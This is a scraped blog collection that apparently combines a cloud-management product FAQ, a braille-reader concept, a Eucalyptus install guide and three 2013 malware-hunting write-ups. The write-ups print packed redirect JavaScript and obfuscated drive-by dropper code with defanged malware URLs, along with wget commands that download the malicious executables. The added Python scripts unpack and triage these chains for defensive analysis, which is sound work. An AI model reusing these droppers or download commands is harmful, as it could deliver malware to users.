
What is MyCloudPortal?

MyCloudPortal provides an enterprise-grade solution for managing multiple clouds from one dashboard.
It is a cloud brokerage tool, aimed at cloud hosting providers and at companies that work with more than one cloud.

What problem does this solve?
There is hardly a company in IT that is not aware of or working with the cloud, and there are many clouds out there: Amazon, vCloud, Eucalyptus, OpenStack and so on.
Managing all of them is hard, and when this project started there was no product on the market that let you manage multiple clouds from one dashboard.

Where can you test this?
It is simple: go to the hosted version, create a user ID and log in.
Provide your cloud credentials and try it out. 🙂
It really is that simple.

Is this free?
Yes, it is free and open. There is a separate branch for enterprise customers, but the free version is available for download.
Expect more in future.
You can build on top of it and add whatever features you want.

How many clouds does this support?
At present the product supports Amazon, Eucalyptus and vCloud. OpenStack support is in progress and will be out soon, and after that we will cover all the major clouds.

How is the user experience?
The product is open and there is a hosted version too, so you can go and check it out at any time.
Beyond that, believe me, it is one of the best and easiest UIs to work with.

If you want to know more about the product, we have some videos too, which should make it easier to understand and clear up any doubts 🙂

What does My Cloud Portal do

Get to know My Cloud Portal

And a couple of new videos with the new UI to make things clearer

If you have any more questions, ask on our website or comment below.


Digital to braille..!!


The heading sounds exciting.
There is an MIT event next week (8th of July 2013). I was planning to take part but unfortunately was not able to get in, so I want everyone else to know what I have been thinking about for the last 2-3 weeks.
I am not much of an electronics guy and am still learning electronics, so please do point out my mistakes so that I can improve this.

This is just a concept which I have not demonstrated yet; I was planning to build a prototype at the event, but since I was not selected I am describing it here so that I can get inputs, and so that anyone who likes it can implement it.

Link to the event is here

I personally believe there are not many good devices on the market that give visually challenged people a real-time reading experience.

So this concept is to convert every kind of digital media to braille.
The best part is that it is not limited to English: it would convert all symbols and languages to braille.
A person using the reader would have the experience of reading a real book, and not just books: web pages and other digital media could be converted to braille too.

There are not many pictures available yet, but I will try to provide some within a few days, as I have neither a camera nor the electronics to show.

Constraints of the present prototype:
For now I am converting all the data to one particular font and keeping the size constant for every medium.

Screen used: something similar to a magnetic drawing slate, which works on the principle of magnetic fields.
Link to Magnetic slate

I have no idea yet how to do this, so my next task is to make this screen work something like a Kindle reader's,
and to increase the magnetic field by supplying power (not sure about this; research in progress).
From what I have read about how E-Ink technology works, we may be able to build something similar to the Kindle e-book reader's screen.

Let's place this screen directly above a breadboard that has office pins in it.
Now, as an image is produced on the screen, it will produce a magnetic field which pulls the office pins towards it.
As we all know, magnetic force is a vector quantity; for those who don't, read about it from here.
The pins directly below the symbols will be pulled up, while the pins that are not directly below will only feel a component of the force at some angle, so they won't be pulled up as far as the pins directly below the symbols (remember that the symbols are magnetic).
Now it is time to measure how far each pin has risen.
This is all I am sure about; after this I am not sure about things.


We may use the pins to trigger a circuit for the specific pattern and reproduce the content on an electronic braille screen or refreshable braille display.


We may trigger the circuit by measuring the pins that have moved from below the breadboard, and then drive the display.

1) It is fast.
2) It will convert all the characters shown on the screen to braille.
3) It will give the real feel of reading a book or viewing a web page in real time.
For now the only constraint is font and size, and I am not sure whether this really matters.

Different ideas which are somewhat similar, and from which this idea is inspired:
1) A braille reader can read up to 200 words per minute
2) Zixel: A 2.5-D Graphical Tactile Display System
3) World’s 1st Braille Smartphone for Blind People

Comments and views required.
I would love it if someone feels like implementing this at their end, and would love to extend it 🙂

My work for autistic people is on my other blog. This was my first blog post for visually challenged people; I will post more updates on this work very soon.
Link to my other blog

How to handle the redirection from malicious websites..!!


The journey starts with a link to a website.

That link told us about a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL looks normal enough if you ignore the .ru part 🙂

When I tried to open it in my browser it redirected me to

So I had to use wget to download the file instead.

After downloading the file I tried to open it in the browser, and again the same redirection. Grrr..

Let's look at the response headers:

HTTP/1.1 200 OK
 Server: nginx/0.8.54
 Date: Thu, 16 May 2013 14:26:15 GMT
 Content-Type: text/html
 Connection: keep-alive
 Last-Modified: Thu, 16 May 2013 14:03:59 GMT
 ETag: "6bc8011-2e9-4dcd6567d31c0"
 Accept-Ranges: bytes
 Content-Length: 745

OK, so we know the site is not down and is redirecting. As we have the code, let's look at the part that redirects us (captured as-is, broken tags included):

<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>

Suspicious. OK, let's see what VirusTotal says about this site.

The above two are for the URL I started with, and the other one is for

So they have a redirect on every page, which means I have to download everything with wget and then analyse it: no GUI, only code 😦

Two different analyses; anyway, the good thing is that both still show it as malicious 🙂

After downloading the second file I analysed it and found two JavaScript files in it.

So I downloaded those two files; the links were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>

Time to analyse these two files. The VirusTotal reports are

For core.js

For caption.js

Indeed they are malicious.

Time to take a look inside these two.

The malicious code is the same in both files.

After decoding it (it is only unescape() around a packed script, not encryption), what I got is:

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

which finally redirects you to h00p://online2you[dot]org/search.php?sid=1, the last entry of the packed word list and the only place in the blob where a URL appears in the clear. The regex it is wrapped in is a mobile user-agent check, so only phones and tablets get sent there.
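Added example (not code from the post): a small Python script that does by hand what the walk-through above did with wget and eyeballing. It pulls out every place a page can send the visitor (meta refresh, 1x1 iframe, a URL parked in a variable, a location assignment) and reverses the Dean Edwards p,a,c,k,e,r packing so the URL buried in the word list comes out in the clear. It is also the check to run on the var X="...exe" snippets in the two posts further down. The sample pages are constructed for this example with hypothetical example.test hosts; the packed script's word list is much shorter than the real one, but the decoding is identical.

```python
import re

# Constructed sample pages for this added example: hostnames and paths are
# hypothetical, but the shapes mirror what the post captured (a meta refresh,
# a 1x1 iframe, a URL parked in a variable among junk conditionals, and a
# Dean Edwards "p,a,c,k,e,r" packed script that redirects mobile browsers).
STAGE1 = '''<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
<meta http-equiv="refresh" content="0; url=http://stage2.example.test/news/ask-index.php"></noscript>'''

STAGE2 = r'''<html><body>
<iframe src="http://tds.example.test/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px;"></iframe>
<script>var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="http://drop.example.test/a1b2/payload.exe?h=32";</script>
<script>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 1=2.3.4(/mobi|android/i);5(1){6.7.8="9"}',62,10,'var|m|navigator|userAgent|match|if|document|location|href|http://mobile.example.test/search.php?sid=1'.split('|'),0,{}))</script>
</body></html>'''

# The tail of a packed script: }('payload', base, count, 'w|o|r|d|s'.split('|')
PACKED_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)")

META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv=["\']?refresh["\']?[^>]*content=["\']\s*\d+\s*;\s*url=([^"\'>\s]+)', re.I)
IFRAME_SRC = re.compile(r'<iframe[^>]*\bsrc=["\']([^"\']+)', re.I)
JS_LOCATION = re.compile(r'location(?:\.href)?\s*=\s*["\']([^"\']+)')
JS_URL_VAR = re.compile(r'\bvar\s+\w+\s*=\s*["\'](https?://[^"\']+)')


def _encode(c, base):
    """Python port of the packer's e(): the token name for dictionary index c."""
    head = '' if c < base else _encode(c // base, base)
    c %= base
    tail = chr(c + 29) if c > 35 else '0123456789abcdefghijklmnopqrstuvwxyz'[c]
    return head + tail


def unpack(payload, base, count, words):
    """Reverse p,a,c,k,e,r: swap every token in payload for its dictionary word.

    Single-pass dictionary substitution, the same form the packer itself uses,
    so a word that happens to look like a token is never substituted twice.
    """
    table = {}
    for i in range(count):
        token = _encode(i, base)
        table[token] = words[i] if i < len(words) and words[i] else token
    return re.sub(r'\b\w+\b', lambda m: table.get(m.group(0), m.group(0)),
                  payload, flags=re.ASCII)


def unpack_all(html):
    """Return the decoded body of every packed script found in html."""
    out = []
    for m in PACKED_RE.finditer(html):
        payload = m.group(1).replace("\\'", "'")
        out.append(unpack(payload, int(m.group(2)), int(m.group(3)),
                          m.group(4).split('|')))
    return out


def extract_urls(text):
    """Every place the page could send the visitor, in document order, deduplicated."""
    hits = []
    for rx in (META_REFRESH, IFRAME_SRC, JS_LOCATION, JS_URL_VAR):
        hits.extend((m.start(), m.group(1)) for m in rx.finditer(text))
    seen, ordered = set(), []
    for _, url in sorted(hits):
        if url not in seen:
            seen.add(url)
            ordered.append(url)
    return ordered


def analyse(html):
    """Unpack obfuscated scripts, then collect the redirect chain from both layers."""
    decoded = unpack_all(html)
    urls = extract_urls(html)
    for script in decoded:
        urls.extend(u for u in extract_urls(script) if u not in urls)
    return {'unpacked': decoded, 'urls': urls}


if __name__ == '__main__':
    for name, page in (('stage1', STAGE1), ('stage2', STAGE2)):
        report = analyse(page)
        print(name, '->', report['urls'])
        for script in report['unpacked']:
            print('  unpacked:', script)
```

Feed it the files wget saved (after turning the h00p/[dot] defanging back into real URLs) instead of the sample strings and it gives you the next hop without opening anything in a browser.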


The next task was to get the payload, as this was most probably the site where they had hidden the treasure.

But unfortunately that was down: error 404

 Connecting to||:80... connected.
 HTTP request sent, awaiting response... 404 Not Found
 2013-05-18 17:44:43 ERROR 404: Not Found.

I thought that, since there is redirection everywhere, this might depend on location, so I tried it through proxies in the US, Russia and 3-4 other countries, but got the same result every time.

Is it just me, or is everyone else unable to download the contents from this site?

OK, let's look at the whois for the website

whois for  h00p://polycontract[dot]ru/

domain:        POLYCONTRACT.RU
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you:

whois for h00p://online2you[dot]org/

Domain ID:D168159997-LROR
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring, Inc. (R1248-LROR)
Status:OK
Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
remarks: Registration information:

And finally a snapshot of all the files I gathered

This was my journey, and this is where it ended.

Your inputs / criticism are required


Eucalyptus Deployment



Most important: enable virtualization in the BIOS, or else nothing is going to work (this is what I forgot to do).

The version of Eucalyptus I used is 3.2, which you can download from

It ships Eucalyptus on top of CentOS and can be installed on one node or on multiple nodes.

Installation on one node is comparatively easy and fast, so I am only going to discuss installation on two nodes.


Hardware I have:

2 identical servers, each with:

quad-core Intel Xeon processor

4 GB RAM

1 TB hard disk

2 network cards


1st machine specification

Name of node: MyCloudPortalNode

IP: eth0: (this is for public use)

eth1: (this is for private use)

1) Start the system, press F2 and get into the BIOS.

2) In the Advanced menu, enable virtualization (it was disabled). Press F10 to save.

3) On restart press F6 and choose the boot-from-CD option.

4) Insert the Eucalyptus DVD and, when it prompts for the options, choose installation of the node server.

5) When it prompts for the network IPs, enter the values already given above.

6) It creates the br0 bridge by itself.

7) Set up the NTP server:

yum install ntp

chkconfig ntpd on

service ntpd start

then check the clock with date.

Leave this machine as it is and go on to install the front end controller.


2nd machine

Name of node: MyCloudPortalFront

IP: eth0:



1) Start the system, press F2 and get into the BIOS.

2) In the Advanced menu, enable virtualization (it was disabled). Press F10 to save.

3) On restart press F6 and choose the boot-from-CD option.

4) Insert the Eucalyptus DVD and, when it prompts for the installation options, choose install front end.

5) Choose the IP already defined above and start it.

6) When it starts it will ask for the public and private IP ranges.

Don't change the private IP; for the public IP, provide the range from which VMs should get their addresses when they are connected.

7) Set all this accordingly and then start the machine.

After the installation is done, on restart it will ask for the IP of the node; enter the node's IP, then it will prompt for the node's root (su) password, enter it, and the node is registered 🙂

8) Set up the NTP server:

yum install ntp

chkconfig ntpd on

service ntpd start

then check the clock with date.

Now, on both machines.

Stop all the Eucalyptus services.

On the front end:

service eucalyptus-cloud stop

service eucalyptus-cc stop

On the NC:

service eucalyptus-nc stop

Now start all three services again (the same commands with start) and test with euca-describe-availability-zones verbose. The command talks to the cloud controller, so it only answers once eucalyptus-cloud is running again.

The output should look like this. I already have 2 small VMs running, so it says 2 free out of 4:

euca-describe-availability-zones verbose

AVAILABILITYZONE CLUSTER01 arn:euca:eucalyptus:CLUSTER01:cluster:cc_01/
AVAILABILITYZONE |- vm types   free / max   cpu   ram  disk
AVAILABILITYZONE |- m1.small   0002 / 0004     1   512     5
AVAILABILITYZONE |- c1.medium  0001 / 0002     2   512    10
AVAILABILITYZONE |- m1.large   0001 / 0002     2  1024    15
AVAILABILITYZONE |- m1.xlarge  0001 / 0002     2  2048    20
AVAILABILITYZONE |- c1.xlarge  0000 / 0001     4  4096    20

This tells you how many VMs you can create and what other resources are available.

Now point your browser at:

https://<frontendip>:8888 : for creating VMs

https://<frontendip>:8443 : for profile editing

Both are administrative interfaces on the front end's public address, so keep them reachable only from your management network, not from the internet.

Now go and play with VMs 🙂

After a VM has been created and is running, this is how it looks.

The green tick mark differs for different kinds of things.

Do comment with your views, any errors or questions.

I love comments 😉

Handling error 402: Payment Required with malicious domain #MMD


Link from where I started:

And that link directed me here:

Error 402, Payment Required.

Request URL:h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar
Request Method:GET
Status Code:402 Payment Required
Response Header
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4


Suspicious, isn't it..

So I proceeded by walking the subdirectories of the server, and that led to the link

which automatically leads to a blank web page.

Response for h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/pdfx.html

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date:Mon, 08 Apr 2013 15:49:50 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4

Response for “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/zmiohek.html”

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date:Mon, 08 Apr 2013 15:49:51 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4


When I analysed its source I found a variable storing a web address, surrounded by junk conditionals that never fire:

var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";

Now use

wget --save-headers -d h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32

-d for debugging and --save-headers for saving the headers.

Or simply paste the URL into your browser to download the exe 😉 (in an isolated analysis VM, never on a machine you care about)

Now this is the analysis report for the file from VirusTotal, and it says 8/45

Anubis report for this exe

Dig report

; <<>> DiG 9.8.3-P1 <<>> XFECAJSMIPICHBEX.IN ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5853
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
XFECAJSMIPICHBEX.IN. 7200 IN SOA 2013040403 7200 7200 172800 38400
;; Query time: 401 msec
;; WHEN: Tue Apr 9 11:42:38 2013
;; MSG SIZE rcvd: 239


Domain ID:D7196301-AFIN
Created On:04-Apr-2013 21:46:01 UTC
Last Updated On:04-Apr-2013 21:46:03 UTC
Expiration Date:04-Apr-2014 21:46:01 UTC
Sponsoring Registrar:Webiq Domains Solutions Pvt. Ltd. (R131-AFIN)
Registrant ID:WIQ_27213783
Registrant Name:founder api
Registrant Organization:N/A
Registrant Street1:foundap 4
Registrant City:new york
Registrant State/Province:New York
Registrant Postal Code:10006
Registrant Country:US
Registrant Phone:+1.5274563219

Domains hosted on the same IP, VirusTotal report:

If you check the whois for every one of these domains you will find the same details, like the phone number.

Screenshot for h00p://

Screenshot of the geographical address locator.

According to the code there are 2 PDFs, but I was able to download just 1 of the 2.


Pdf downloaded


Header for page “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/TLfeaOwS.pdf”


PDF Data over browser:


%PDF-1.6 %�•� 18 0 obj <> endobj 6 0 obj <> endobj 22 0 obj <> endobj 8 0 obj <> stream 1.6511*pdf Piexnlaypa

endstream endobj 20 0 obj <> endobj 23 0 obj <> endobj 5 0 obj <> endobj 1 0 obj <> endobj 21 0 obj <> endobj 7 0 obj <> /XObject <<>>>> endobj 19 0 obj <> endobj xref 0 24 trailer <> startxref 802 %%EOF
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date:Tue, 09 Apr 2013 13:17:17 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4

VirusTotal report for the PDF file

which confirms it as malicious.

Snapshot of all the files.

Every time you download the file it gives it a different random name.



Malicious analysis #MMD


We got the information about the bad guy from this link (

which finally leads us to this website: h00p://www.robaina91[dot]com/es/robaina-album.html

This looks like a normal site, but it is not (though Google Chrome had already warned me that the site is malicious).

Let's look at the response headers:

Date:Wed, 10 Apr 2013 10:45:33 GMT
Last-Modified:Fri, 01 Feb 2013 20:09:26 GMT
Server:Apache/2.2.3 (CentOS)

Looks normal, and indeed it is. Let's dig a little deeper 🙂

On a little analysis of the code I found:

<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;">


OK, let's analyse this link: h00p://allbestauto042[dot]ru/in.cgi?ftp

The headers say

Request URL:h00p://allbestauto042[dot]ru/in.cgi?ftp
Request Method:GET
Status Code:302 Found

Query string parameter: ftp (no value)

Response headers

Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:08:31 GMT
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;
Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;

Why a 302? Why is it redirecting, and why isn't it showing Google? I don't know; please do tell me, as I have no idea, but this looks suspicious.

This is how a traffic direction system (TDS) behaves: the in.cgi script looks at the visitor (browser, referrer, geography), sets cookies so it does not serve the same visitor twice, and answers with a 302 either to the next hop in the chain or to a harmless site for visitors it does not want.

After this it loads 10 PHP files, named flow01 to flow10.

Let's dig a little more.

Request URL:h00p://promoution115[dot]ru/tds/in.cgi?default

Request Method:GET

Status Code:302 Found


Response headers

Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:14:46 GMT
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxdefault=_10_0_20_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/;
Set-Cookie:vbpnx2=_0_98_102_48_35_58_88_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/;

Redirecting again.


After digging a little more I came across

This asked me to run Java; as I don't know the website I never gave permission, but it means I am on track and close to my target.

So let's dig a little more.

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date:Thu, 11 Apr 2013 04:17:33 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4
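The tells in this header dump, in the ones from the 402 post above, and in the in.cgi hops earlier in this post are worth scripting. What follows is an added example (not code from the post) that parses a pasted header block and reports them: a 3xx hop together with the state cookies a TDS sets, PHP's session nocache defaults (the 1981 Expires date and the post-check/pre-check values) sitting under an ASP.NET banner, a .jar or .exe answered with text/html, and the 402 itself. The dumps are constructed for the example with hypothetical hosts; the Location value is an assumption, since the post did not capture where its 302s pointed.

```python
import re
from urllib.parse import urlsplit

# PHP's session_cache_limiter('nocache') emits exactly these two values. Seeing
# them under an "X-Powered-By: ASP.NET" banner means the banner is decoration.
PHP_NOCACHE_EXPIRES = 'Thu, 19 Nov 1981 08:52:00 GMT'
PHP_NOCACHE_CC = 'post-check=0, pre-check=0'
# Extensions that should never come back as text/html when the payload is real.
BINARY_EXT = ('.jar', '.exe', '.pdf', '.swf')

# Constructed header dumps (hypothetical hosts; the Location value is an
# assumption, the post did not capture where its 302s pointed).
GATE_402 = """Request URL:http://drop.example.test/s5c1/vSdOq.jar
Request Method:GET
Status Code:402 Payment Required
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4"""

TDS_302 = """Request URL:http://tds.example.test/in.cgi?ftp
Request Method:GET
Status Code:302 Found
Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:08:31 GMT
Location:http://tds2.example.test/tds/in.cgi?default
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;
Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;"""

PLAIN_200 = """HTTP/1.1 200 OK
 Server: nginx/0.8.54
 Content-Type: text/html
 Content-Length: 745"""


def parse_headers(raw):
    """Parse a pasted dump: dev-tools 'Name:Value' lines or a raw HTTP response.

    Returns (url, status, headers); headers is a list of (name, value) pairs so
    repeated Set-Cookie lines are all kept.
    """
    url, status, headers = None, None, []
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        m = re.match(r'HTTP/\d(?:\.\d)?\s+(\d{3})', line)
        if m:
            status = int(m.group(1))
            continue
        name, _, value = line.partition(':')
        name, value = name.strip(), value.strip()
        key = name.lower()
        if key == 'request url':
            url = value
        elif key == 'status code':
            status = int(value.split()[0])
        elif key != 'request method':
            headers.append((name, value))
    return url, status, headers


def triage(raw):
    """Return (status, findings). Each finding is 'code: explanation'."""
    url, status, headers = parse_headers(raw)

    def values(name):
        return [v for n, v in headers if n.lower() == name.lower()]

    def first(name):
        return (values(name) or [''])[0]

    findings = []
    if status is not None and 300 <= status < 400:
        target = first('Location') or '<no Location captured>'
        findings.append(f'redirect: {status} to {target}')
        cookies = [c.split('=', 1)[0] for c in values('Set-Cookie')]
        if cookies:
            # A TDS marks the visitor so it does not hand out the same hop twice.
            findings.append('tds-cookies: state cookies set on the hop: ' + ', '.join(cookies))

    php_like = (first('Expires') == PHP_NOCACHE_EXPIRES
                or PHP_NOCACHE_CC in first('Cache-Control'))
    if php_like:
        findings.append('php-fingerprint: Expires/Cache-Control are PHP session nocache defaults')
        if 'asp.net' in first('X-Powered-By').lower():
            findings.append('banner-mismatch: X-Powered-By claims ASP.NET on a PHP response')

    if url:
        path = urlsplit(url).path.lower()
        ctype = first('Content-Type').split(';')[0].strip().lower()
        if path.endswith(BINARY_EXT) and ctype.startswith('text/'):
            ext = path.rsplit('.', 1)[1]
            findings.append(f'type-mismatch: .{ext} requested but {ctype} returned (a gate page, not the payload)')

    if status == 402:
        findings.append('odd-status: 402 Payment Required is reserved for future use and essentially never sent by a real download host')
    return status, findings


def codes(findings):
    """Just the finding codes, for quick comparison."""
    return [f.split(':', 1)[0] for f in findings]


if __name__ == '__main__':
    for label, dump in (('402 gate', GATE_402), ('TDS hop', TDS_302), ('plain page', PLAIN_200)):
        status, findings = triage(dump)
        print(f'{label} (HTTP {status}):')
        for f in findings:
            print('  ' + f)
```

Paste the headers wget saved with --save-headers, or the dev-tools response block, into triage() and each hop of the chain gets the same checks; the plain nginx page from the first post comes back with nothing flagged, which is the point of having a baseline.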



Let's take a look at its code


ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';
var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';
var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";
</script>


Isn't this suspicious..??

Let's look at another file now; this one ends up with

Request Method:GET
Status Code:200 OK
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date:Thu, 11 Apr 2013 12:04:24 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By:ASP.NET version 4

<input type="text" id="bxpkr" value="...">

So, a text field with some random text…

Nothing much. Let's go back and analyse the file we got from the JavaScript 🙂






The new script is where we got what we really wanted: the real malware 🙂


wget --save-headers h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA


Download this file and let's see its reports.

VirusTotal report

Anubis report

So, malware confirmed.


In the process of analysis I came across "h00p://golf2day[dot]com/wnqe.html", but I was not able to confirm why it is malicious, or why the browser flags it as malicious, as it was asking for an ID and password and setting up a secure connection.


Anyway, let's look at the domain and its whois

Domain Name: 3D-GAME.COM
Registrar: DNC HOLDINGS, INC.
Whois Server:
Referral URL:
Name Server: NS1.DTDNS.COM
Name Server: NS2.DTDNS.COM
Name Server: NS3.DTDNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 03-oct-2012
Creation Date: 13-apr-2003
Expiration Date: 13-apr-2014

Registrant: North Loop Networks
1807 3rd st ne
Minneapolis, MN 55418
612 385 5501

Domain Name: 3D-GAME.COM

Administrative Contact:
